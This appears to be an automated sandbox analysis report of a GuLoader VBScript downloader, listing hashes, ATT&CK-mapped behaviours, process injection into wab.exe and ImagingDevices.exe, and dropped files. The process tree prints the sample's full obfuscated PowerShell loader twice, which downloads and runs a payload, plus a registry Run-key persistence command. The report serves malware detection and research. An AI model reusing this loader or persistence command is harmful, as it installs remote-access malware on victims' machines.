guloader | d91e772f6c655c2179ddff4d9314395a66b5d7f0eda8895432d53ca8ba42fa6e

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
26-06-2024 03:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8e0046c2970cc659c2c928a72a71256ce54275281aba6ee2ea1f0d90131201c3.vbs
Size

9KB
MD5

f107cca31b6e26749df68211f8b05cc6
SHA1

5711db3dfedb21e709b2fe6921e9cd6bb4d9f553
SHA256

8e0046c2970cc659c2c928a72a71256ce54275281aba6ee2ea1f0d90131201c3
SHA512

8c44a4999bfcae97e0f2da805df13dd8e7f46700effcbbbb6ef4ff5b1f5a4514117f398d65d28fc7b2aa9d45a9c3c3b259ac60fdc7b2aeb50b5d037bc2863f6a
SSDEEP

192:CItYB8umYh7/mU5PC4SWYrdZIV1WbrY375rC7Sv/t:mFmYh7egK4ZmMXyx7U/t

Score

10^/10

guloader downloader execution persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

25 676 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

676 powershell.exe

flow	pid	process
25	676	powershell.exe

pid	process
676	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Smuglet = "%Arusa% -w 1 $Bessemer=(Get-ItemProperty -Path 'HKCU:\\Bedragernes\\').unwrongful;%Arusa% ($Bessemer)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

ImagingDevices.exe

pid process

4680 ImagingDevices.exe
4680 ImagingDevices.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeImagingDevices.exe

pid process

5000 powershell.exe
4680 ImagingDevices.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 5000 set thread context of 4680 5000 powershell.exe ImagingDevices.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2536 reg.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

676 powershell.exe
676 powershell.exe
5000 powershell.exe
5000 powershell.exe
5000 powershell.exe

pid	process
4680	ImagingDevices.exe
4680	ImagingDevices.exe

description	pid	process	target process
PID 5000 set thread context of 4680	5000	powershell.exe	ImagingDevices.exe

pid	process
2536	reg.exe

pid	process
676	powershell.exe
676	powershell.exe
5000	powershell.exe
5000	powershell.exe
5000	powershell.exe

Suspicious behavior: MapViewOfSection 12 IoCs

Processes:

powershell.exe

pid	process
5000	powershell.exe
5000	powershell.exe
5000	powershell.exe
5000	powershell.exe
5000	powershell.exe
5000	powershell.exe
5000	powershell.exe
5000	powershell.exe
5000	powershell.exe
5000	powershell.exe
5000	powershell.exe
5000	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 676 powershell.exe
Token: SeDebugPrivilege 5000 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

ImagingDevices.exe

pid process

4680 ImagingDevices.exe

description	pid	process
Token: SeDebugPrivilege	676	powershell.exe
Token: SeDebugPrivilege	5000	powershell.exe

pid	process
4680	ImagingDevices.exe

Suspicious use of WriteProcessMemory 54 IoCs

Processes:

WScript.exepowershell.exepowershell.exeImagingDevices.execmd.exe

description	pid	process	target process
PID 5112 wrote to memory of 676	5112	WScript.exe	powershell.exe
PID 5112 wrote to memory of 676	5112	WScript.exe	powershell.exe
PID 676 wrote to memory of 1800	676	powershell.exe	cmd.exe
PID 676 wrote to memory of 1800	676	powershell.exe	cmd.exe
PID 676 wrote to memory of 5000	676	powershell.exe	powershell.exe
PID 676 wrote to memory of 5000	676	powershell.exe	powershell.exe
PID 676 wrote to memory of 5000	676	powershell.exe	powershell.exe
PID 5000 wrote to memory of 3592	5000	powershell.exe	cmd.exe
PID 5000 wrote to memory of 3592	5000	powershell.exe	cmd.exe
PID 5000 wrote to memory of 3592	5000	powershell.exe	cmd.exe
PID 5000 wrote to memory of 3148	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 3148	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 3148	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 1732	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 1732	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 1732	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 212	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 212	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 212	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 1384	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 1384	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 1384	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 4508	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 4508	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 4508	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 4404	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 4404	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 4404	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 456	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 456	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 456	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 2604	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 2604	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 2604	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 732	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 732	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 732	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 3416	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 3416	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 3416	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 4364	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 4364	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 4364	5000	powershell.exe	wab.exe
PID 5000 wrote to memory of 4680	5000	powershell.exe	ImagingDevices.exe
PID 5000 wrote to memory of 4680	5000	powershell.exe	ImagingDevices.exe
PID 5000 wrote to memory of 4680	5000	powershell.exe	ImagingDevices.exe
PID 5000 wrote to memory of 4680	5000	powershell.exe	ImagingDevices.exe
PID 5000 wrote to memory of 4680	5000	powershell.exe	ImagingDevices.exe
PID 4680 wrote to memory of 3376	4680	ImagingDevices.exe	cmd.exe
PID 4680 wrote to memory of 3376	4680	ImagingDevices.exe	cmd.exe
PID 4680 wrote to memory of 3376	4680	ImagingDevices.exe	cmd.exe
PID 3376 wrote to memory of 2536	3376	cmd.exe	reg.exe
PID 3376 wrote to memory of 2536	3376	cmd.exe	reg.exe
PID 3376 wrote to memory of 2536	3376	cmd.exe	reg.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8e0046c2970cc659c2c928a72a71256ce54275281aba6ee2ea1f0d90131201c3.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:5112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden "cls;write 'kamferolien Konfusionens troskabslftet Indenrigshandler Indlemmelsen Citadel Tallium parallelogrammets Knlang Unsentenced';$Shapingly = 1;Function Uldgarners($Enerverede133){$Taklingers128=$Enerverede133.Length-$Shapingly;$Skruestiksbnk236='SUBSTRIN';$Skruestiksbnk236+='G';For( $Dumpningerne=4;$Dumpningerne -lt $Taklingers128;$Dumpningerne+=5){$kamferolien+=$Enerverede133.$Skruestiksbnk236.Invoke( $Dumpningerne, $Shapingly);}$kamferolien;}function Ublandet($Cockfights){ & ($Carpet) ($Cockfights);}$Interfiling=Uldgarners 'Ufr MRhino akizSpo.iOut lCrillSolaaExps/Dolm5Bore.Shee0Butt Arc(KadaWSta.iCentn .ugdHae,oVan wInshsCa f Gla.NBallTrea, Reup1 Mul0Avit.Cont0Xeno;Syri Taa,WFe.hiAu.inU cu6Surm4 Mot;Ga.f ta oxUnpr6Labi4Impa;P,en Commrra iv.est: Pee1Hart2Raas1Jou . pre0Spyd)Stri f,skGTsnieLagrcLnrekLum.oKlod/Iri.2Bete0T ar1Ride0K,up0 .lu1Caly0Roul1Unde N.niFBiopi wir G ye elfkor.oGro.xAnk,/ Ate1Trll2 ,ot1Oxid.F,rs0 Bim ';$Avianizes172=Uldgarners 'SubpULi.hsHel.eDarkrA.ti- OveA AmbgForleJenmnFoe.tSupe ';$Indlemmelsen=Uldgarners 'Plaih,andt La tMetap Rad:Urm,/Luxm/ SmidDecen.nopvT kskMoto1 .pp.DubliFibrnMultf.armo Def/TilrwFygnpbort-DisdaNoncdSubjmOrdiiMorgnGri,/AcceCSyttoEgnemSatytHjlpiSemiaEnsinQua . GareGranmUnmezFej. ';$Hkker=Uldgarners 'Anta> Pla ';$Carpet=Uldgarners 'Fde.iLooseS lfx Pta ';$Rosehiller='parallelogrammets';$Uncleavable = Uldgarners 'anabeTo.mc .orh.nseo Cho Tran% israpolapDep pCribd QuiaDis.tels.aSu f%Xylo\TegnOMaddeOvermHjemm ybdePrdi.Re,eSjuicpUndeowing Pap&Leat&Selv AndeTri,cBeskhSteroMo.d AfstTusc ';Ublandet (Uldgarners 'Un.n$AdhegSta.lAgaroSnacb PleaT.rkl Ann:D stSStora aznTittcPontt CliiUdtro aadnAcrom ,kyeCatanSkrotSk,r=W.nd( ndac GenmAffldCoat Humd/ E rcSt,r Anac$MacrUVeninBe,ec Coclt lee AfmaUddtv,verahegebA.del Un.ec.lo)Pr.v ');Ublandet (Uldgarners 'Fila$ArabgBookl nimoUdfrbParaa RkelFa.o: GalI U,cnSub,dSulleE.sanBrevrJesyiDomegApersN.crhBrugaPhotn S.rdHaanlDybfePumprUnco= Str$PejlIAfs nUne dsk.olThrue.krimBe.zmChakethyrlCon.sCa.vePimpnSoap.sm.ks digpHydrlCa.ei S.utOver(Chil$U.ulH,ntgkMi.jkAgateVoucrRegi)Disp ');Ublandet (Uldgarners 'Cyke[BullNra keInv,tErst. ,orSRampeBacirCathv apiFixgcTjene tr PsteroYr.eiFounn ,ostBismMAfslaChaunElekaFyldg Soke NatrBalt]D.ce: raf:FlorS Stre BercVetcu Dy.rS,nsi ,detPalpy n.nPgowdr Grao Part P,toKvgecRevao .tolTime P.ts=Surf Ceme[ OveNPyroeStr t dis. St.SAndeerigmcUnjouHngerNavni,angtInd.yStemPU strCo.coIncatImpeoChatc K.noSoublSvarT,ndsyFotop K.ae Va,]Modi: Non:R.seT.verlFrotsKara1Flam2indu ');$Indlemmelsen=$Indenrigshandler[0];$doppelkummel= (Uldgarners 'Of,i$.derg L,gl ammoI,brbUnbra S,al,enk:PhreMwi.do Opvn Heak.ntisB,ut=LingN SpieFa.swBism-,ritOD.smbTilsj ,ooeSc,rc,esitTape klaS WeiyKolosrefut Si,eMo,em oda.UnpeNsh,mePerftBa y. ElmWB speVarebPseuCPrael ForiAmiseTimbnUnf t');$doppelkummel+=$Sanctionment[1];Ublandet ($doppelkummel);Ublandet (Uldgarners 'Tr.n$.aasMKvaroRealn eltkTennsHaml.MocmHBeaceOveraFavod OpeeSkilr unrsCasc[Mind$.pdrAErhvvGut.i.somaMoltnIn,ei.ilmz .rue s isDef 1 G e7Loud2Pio.] .en=ib,p$FladI so nPatrtDomeebes r E pfSaxoiaprolAcriiBeginRo igAnth ');$Kontraktionernes=Uldgarners 'Aare$Hva MKontoU ornFil.kRlins ngr. SkaD undo phewUnqunFalxludfao Fl aKnowdDesuFMutuiMorglHvereC nv(.kue$IndsItjennBeledAttilRajaefolimAflumfokke Dvel RetsSelveJovinHype, Fre$SpreW Tyle .enaMuscsWitco Trun D a)Styr ';$Weason=$Sanctionment[0];Ublandet (Uldgarners 'bar,$ ,ergBlenl FoeoDo ebRkeea TaglN nf:KuldDMiniiSubofSygef ekne VesrSt ieUfe,nDokut Bu,iPreleMisrrDeroiUgenn udgg CloeEluenSl,ms olk=Ra,e(UnreTInqueImmishypet Kol-E.doPTh.raTilbtGasthrou. Repu$ RaaWNonaeRboea Mugslif oS,utnInfe)Ali. ');while (!$Differentieringens) {Ublandet (Uldgarners ' om$Hypogrn nl reeoK ukbTrykaGstgl.ehk:DenaLvowlrAlkaeSegrpn,nur Stuo,ntecMa.neU,prsAllasDispe SworCarbnlandeThyi=Komc$BisstRenorBe,luDomeeKuld ') ;Ublandet $Kontraktionernes;Ublandet (Uldgarners 'BaanSSor tD,praRhetrhjtrt,amm- nnSAmazlA,tieT.ane Fecp Pro Per4Edvi ');Ublandet (Uldgarners ' Tai$BrndgFrikl Frio.nupbA.traF culMono: TaaD N,diSla,fSnudf H.aeStonrBygheOvern dsetEkseiVrdie.axarEkstiPetanpalsgBet eSkrun LomsDisc=Ste (NeopTAnsteConfsPrestEmbr-SulpPK,ola.alit BehhFlov Luny$DoubWSh ee redaOarisGranoPur nFro,).ull ') ;Ublandet (Uldgarners 'Gudb$ u.egHemil La o istbPaaha Be.l Gaz:.vertM sor TusoAcuts frkSttea FacbAsylsAntrl W.tfEnertNuzzeNeoptA.be=Tils$ FungIrrelInspoHaembIndaa ,islHi.l:MicrKSi,uoPr,nn IntfMin,uAn,gsArbeim.llo .eln PugeMilinTyvss Blo+Boyk+Slet% Lak$BygnIUndenBlo dLangeUn tnP,rir.agsiDilug.elmssemihHyalaTropnCh ldAllel O,yeStvnr ary. SyncSympopro u HjenSpndtH in ') ;$Indlemmelsen=$Indenrigshandler[$troskabslftet];}$Korruptionens=298513;$Udskibningshavne=27939;Ublandet (Uldgarners 'Plat$DekogWobbl P aoD.onb,raga Oz.lSpla:W.ipK QuinJunilKrona BaanOrkegHet, Udh=p,op FiskG irdeAntitMacr-Non,Ctougo FornEurytSubfeSeisn.adrtunhu Berg$re.iWKlareIncua.edssVet.oLn.bnFlyg ');Ublandet (Uldgarners 'Forh$MapogChemlBrneoKr,ibRec aRibsl,ubs:Sp,eS.ynda SkdmInk lTr aeprotrRecrgNedfiM crrD,aweViderSelei,uffnUndegPart Matc=Me,a Doct[ enuS StryFejlsForptPis eNa.um .ea.SporCPrecoenganHk.evAfreeTjrer ne t en].lae:Tosd: U.dF Fa rSocioAxopmStetBO,eraSlitsE,cte.tom6 Roa4 S,eSA titAma,rT,ykiFllen Da.gelec(Unca$ ComKH arn Ov,lIso aMedin Lu,g.chl)Hemp ');Ublandet (Uldgarners 'Arra$Chakg MurlSalvoO,onbSeata deslZ,go:,kreRSkareStornF.ned dioeRe.ojKapieUopsrSkulnRitesfel. Outr=Sl.e Lpla[Mez.SLugtyUnwosYurttChr,eBa km for.R.deTFilmeScenxSenst Bor.BjrnEFyrsnbruncor.io AradTamaiAntinLodogErik]Craz:Unpo:GaspAvalgSInddC C,aIS,hyI Ord.CharGSukke oshtDechS .intUnderFedti,ragn Grog ut(Wigh$Tit SMaryaKoremTe rlSi ae Kr.r GnagAltei Skrr Syne TryrPletiGearn RungKaka) Akt ');Ublandet (Uldgarners 'B,kt$ ThigCo.bl Belo,eddb bela orfl ham:Tys,SSv.nn AmaeBelamHearaDeren GladUnd eVinonBlodsInca=hug.$imp,R Mode pernKagedUrbae TrajRustemacrr UdanAlexsreta.MisbsSublu ResbPhals GentKoncrDe,niBi.tnKammgImpe(Fris$ takKB lioOmberWestrUnfruvideptucst agiiLkkeo irsn CaceSilen,nsisBlo,, erp$RibbUPrisdStj sSp,kkUni iP inbD honExemi Ovend,wagBrods,warhL.njaElpavGundnCente,ros)Valf ');Ublandet $Snemandens;"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:676

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Oemme.Spo && echo t"
3⤵
PID:1800

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'kamferolien Konfusionens troskabslftet Indenrigshandler Indlemmelsen Citadel Tallium parallelogrammets Knlang Unsentenced';$Shapingly = 1;Function Uldgarners($Enerverede133){$Taklingers128=$Enerverede133.Length-$Shapingly;$Skruestiksbnk236='SUBSTRIN';$Skruestiksbnk236+='G';For( $Dumpningerne=4;$Dumpningerne -lt $Taklingers128;$Dumpningerne+=5){$kamferolien+=$Enerverede133.$Skruestiksbnk236.Invoke( $Dumpningerne, $Shapingly);}$kamferolien;}function Ublandet($Cockfights){ & ($Carpet) ($Cockfights);}$Interfiling=Uldgarners 'Ufr MRhino akizSpo.iOut lCrillSolaaExps/Dolm5Bore.Shee0Butt Arc(KadaWSta.iCentn .ugdHae,oVan wInshsCa f Gla.NBallTrea, Reup1 Mul0Avit.Cont0Xeno;Syri Taa,WFe.hiAu.inU cu6Surm4 Mot;Ga.f ta oxUnpr6Labi4Impa;P,en Commrra iv.est: Pee1Hart2Raas1Jou . pre0Spyd)Stri f,skGTsnieLagrcLnrekLum.oKlod/Iri.2Bete0T ar1Ride0K,up0 .lu1Caly0Roul1Unde N.niFBiopi wir G ye elfkor.oGro.xAnk,/ Ate1Trll2 ,ot1Oxid.F,rs0 Bim ';$Avianizes172=Uldgarners 'SubpULi.hsHel.eDarkrA.ti- OveA AmbgForleJenmnFoe.tSupe ';$Indlemmelsen=Uldgarners 'Plaih,andt La tMetap Rad:Urm,/Luxm/ SmidDecen.nopvT kskMoto1 .pp.DubliFibrnMultf.armo Def/TilrwFygnpbort-DisdaNoncdSubjmOrdiiMorgnGri,/AcceCSyttoEgnemSatytHjlpiSemiaEnsinQua . GareGranmUnmezFej. ';$Hkker=Uldgarners 'Anta> Pla ';$Carpet=Uldgarners 'Fde.iLooseS lfx Pta ';$Rosehiller='parallelogrammets';$Uncleavable = Uldgarners 'anabeTo.mc .orh.nseo Cho Tran% israpolapDep pCribd QuiaDis.tels.aSu f%Xylo\TegnOMaddeOvermHjemm ybdePrdi.Re,eSjuicpUndeowing Pap&Leat&Selv AndeTri,cBeskhSteroMo.d AfstTusc ';Ublandet (Uldgarners 'Un.n$AdhegSta.lAgaroSnacb PleaT.rkl Ann:D stSStora aznTittcPontt CliiUdtro aadnAcrom ,kyeCatanSkrotSk,r=W.nd( ndac GenmAffldCoat Humd/ E rcSt,r Anac$MacrUVeninBe,ec Coclt lee AfmaUddtv,verahegebA.del Un.ec.lo)Pr.v ');Ublandet (Uldgarners 'Fila$ArabgBookl nimoUdfrbParaa RkelFa.o: GalI U,cnSub,dSulleE.sanBrevrJesyiDomegApersN.crhBrugaPhotn S.rdHaanlDybfePumprUnco= Str$PejlIAfs nUne dsk.olThrue.krimBe.zmChakethyrlCon.sCa.vePimpnSoap.sm.ks digpHydrlCa.ei S.utOver(Chil$U.ulH,ntgkMi.jkAgateVoucrRegi)Disp ');Ublandet (Uldgarners 'Cyke[BullNra keInv,tErst. ,orSRampeBacirCathv apiFixgcTjene tr PsteroYr.eiFounn ,ostBismMAfslaChaunElekaFyldg Soke NatrBalt]D.ce: raf:FlorS Stre BercVetcu Dy.rS,nsi ,detPalpy n.nPgowdr Grao Part P,toKvgecRevao .tolTime P.ts=Surf Ceme[ OveNPyroeStr t dis. St.SAndeerigmcUnjouHngerNavni,angtInd.yStemPU strCo.coIncatImpeoChatc K.noSoublSvarT,ndsyFotop K.ae Va,]Modi: Non:R.seT.verlFrotsKara1Flam2indu ');$Indlemmelsen=$Indenrigshandler[0];$doppelkummel= (Uldgarners 'Of,i$.derg L,gl ammoI,brbUnbra S,al,enk:PhreMwi.do Opvn Heak.ntisB,ut=LingN SpieFa.swBism-,ritOD.smbTilsj ,ooeSc,rc,esitTape klaS WeiyKolosrefut Si,eMo,em oda.UnpeNsh,mePerftBa y. ElmWB speVarebPseuCPrael ForiAmiseTimbnUnf t');$doppelkummel+=$Sanctionment[1];Ublandet ($doppelkummel);Ublandet (Uldgarners 'Tr.n$.aasMKvaroRealn eltkTennsHaml.MocmHBeaceOveraFavod OpeeSkilr unrsCasc[Mind$.pdrAErhvvGut.i.somaMoltnIn,ei.ilmz .rue s isDef 1 G e7Loud2Pio.] .en=ib,p$FladI so nPatrtDomeebes r E pfSaxoiaprolAcriiBeginRo igAnth ');$Kontraktionernes=Uldgarners 'Aare$Hva MKontoU ornFil.kRlins ngr. SkaD undo phewUnqunFalxludfao Fl aKnowdDesuFMutuiMorglHvereC nv(.kue$IndsItjennBeledAttilRajaefolimAflumfokke Dvel RetsSelveJovinHype, Fre$SpreW Tyle .enaMuscsWitco Trun D a)Styr ';$Weason=$Sanctionment[0];Ublandet (Uldgarners 'bar,$ ,ergBlenl FoeoDo ebRkeea TaglN nf:KuldDMiniiSubofSygef ekne VesrSt ieUfe,nDokut Bu,iPreleMisrrDeroiUgenn udgg CloeEluenSl,ms olk=Ra,e(UnreTInqueImmishypet Kol-E.doPTh.raTilbtGasthrou. Repu$ RaaWNonaeRboea Mugslif oS,utnInfe)Ali. ');while (!$Differentieringens) {Ublandet (Uldgarners ' om$Hypogrn nl reeoK ukbTrykaGstgl.ehk:DenaLvowlrAlkaeSegrpn,nur Stuo,ntecMa.neU,prsAllasDispe SworCarbnlandeThyi=Komc$BisstRenorBe,luDomeeKuld ') ;Ublandet $Kontraktionernes;Ublandet (Uldgarners 'BaanSSor tD,praRhetrhjtrt,amm- nnSAmazlA,tieT.ane Fecp Pro Per4Edvi ');Ublandet (Uldgarners ' Tai$BrndgFrikl Frio.nupbA.traF culMono: TaaD N,diSla,fSnudf H.aeStonrBygheOvern dsetEkseiVrdie.axarEkstiPetanpalsgBet eSkrun LomsDisc=Ste (NeopTAnsteConfsPrestEmbr-SulpPK,ola.alit BehhFlov Luny$DoubWSh ee redaOarisGranoPur nFro,).ull ') ;Ublandet (Uldgarners 'Gudb$ u.egHemil La o istbPaaha Be.l Gaz:.vertM sor TusoAcuts frkSttea FacbAsylsAntrl W.tfEnertNuzzeNeoptA.be=Tils$ FungIrrelInspoHaembIndaa ,islHi.l:MicrKSi,uoPr,nn IntfMin,uAn,gsArbeim.llo .eln PugeMilinTyvss Blo+Boyk+Slet% Lak$BygnIUndenBlo dLangeUn tnP,rir.agsiDilug.elmssemihHyalaTropnCh ldAllel O,yeStvnr ary. SyncSympopro u HjenSpndtH in ') ;$Indlemmelsen=$Indenrigshandler[$troskabslftet];}$Korruptionens=298513;$Udskibningshavne=27939;Ublandet (Uldgarners 'Plat$DekogWobbl P aoD.onb,raga Oz.lSpla:W.ipK QuinJunilKrona BaanOrkegHet, Udh=p,op FiskG irdeAntitMacr-Non,Ctougo FornEurytSubfeSeisn.adrtunhu Berg$re.iWKlareIncua.edssVet.oLn.bnFlyg ');Ublandet (Uldgarners 'Forh$MapogChemlBrneoKr,ibRec aRibsl,ubs:Sp,eS.ynda SkdmInk lTr aeprotrRecrgNedfiM crrD,aweViderSelei,uffnUndegPart Matc=Me,a Doct[ enuS StryFejlsForptPis eNa.um .ea.SporCPrecoenganHk.evAfreeTjrer ne t en].lae:Tosd: U.dF Fa rSocioAxopmStetBO,eraSlitsE,cte.tom6 Roa4 S,eSA titAma,rT,ykiFllen Da.gelec(Unca$ ComKH arn Ov,lIso aMedin Lu,g.chl)Hemp ');Ublandet (Uldgarners 'Arra$Chakg MurlSalvoO,onbSeata deslZ,go:,kreRSkareStornF.ned dioeRe.ojKapieUopsrSkulnRitesfel. Outr=Sl.e Lpla[Mez.SLugtyUnwosYurttChr,eBa km for.R.deTFilmeScenxSenst Bor.BjrnEFyrsnbruncor.io AradTamaiAntinLodogErik]Craz:Unpo:GaspAvalgSInddC C,aIS,hyI Ord.CharGSukke oshtDechS .intUnderFedti,ragn Grog ut(Wigh$Tit SMaryaKoremTe rlSi ae Kr.r GnagAltei Skrr Syne TryrPletiGearn RungKaka) Akt ');Ublandet (Uldgarners 'B,kt$ ThigCo.bl Belo,eddb bela orfl ham:Tys,SSv.nn AmaeBelamHearaDeren GladUnd eVinonBlodsInca=hug.$imp,R Mode pernKagedUrbae TrajRustemacrr UdanAlexsreta.MisbsSublu ResbPhals GentKoncrDe,niBi.tnKammgImpe(Fris$ takKB lioOmberWestrUnfruvideptucst agiiLkkeo irsn CaceSilen,nsisBlo,, erp$RibbUPrisdStj sSp,kkUni iP inbD honExemi Ovend,wagBrods,warhL.njaElpavGundnCente,ros)Valf ');Ublandet $Snemandens;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5000

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Oemme.Spo && echo t"
4⤵
PID:3592

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
PID:3148

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
PID:1732

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
PID:212

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
PID:1384

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
PID:4508

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
PID:4404

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
PID:456

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
PID:2604

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
PID:732

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
PID:3416

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
PID:4364

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4680

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Smuglet" /t REG_EXPAND_SZ /d "%Arusa% -w 1 $Bessemer=(Get-ItemProperty -Path 'HKCU:\Bedragernes\').unwrongful;%Arusa% ($Bessemer)"
5⤵
- Suspicious use of WriteProcessMemory
PID:3376

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Smuglet" /t REG_EXPAND_SZ /d "%Arusa% -w 1 $Bessemer=(Get-ItemProperty -Path 'HKCU:\Bedragernes\').unwrongful;%Arusa% ($Bessemer)"
6⤵
- Adds Run key to start application
- Modifies registry key
PID:2536

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat
Filesize
144B

MD5
371b892c9d0c56a3a7b0593ab0751fec

SHA1
a741c847a93302b68fa328646c7dd9b5fb257e72

SHA256
c40718adf8b0e6188802ed5a485be3bc6997c6d38eafcee3eddc254d13eb83fb

SHA512
e8a642f4cb3d935a13a52ac345f4ad2b75172a9988dce758779084f6822bb8dd552b93b6943bcb034e620727f6bcf29fbd7c68f38a08769a2e761a77b0787951

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_brh24o25.tsa.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Oemme.Spo
Filesize
425KB

MD5
12e1baf4e982b5894f8fc6d026f937f8

SHA1
041bd4a3cee3f21a07424aca0458ea37f742fae3

SHA256
61757b8778cc6623d1643aec9f58a581641bbb8683f52c5a2b3492e574e0793a

SHA512
4bd199d810e141e0a1692db3ab4a70480a34dccba0452a7b928e24391b3579b69965bbff521e71666e7febcb0fc51d6f46481674fe530f2284b8db5eeedd21d2

Download Submit
memory/676-6-0x000002D7B4C40000-0x000002D7B4C62000-memory.dmp

Filesize
136KB

Download
memory/676-11-0x00007FF81F080000-0x00007FF81FB41000-memory.dmp

Filesize
10.8MB

Download
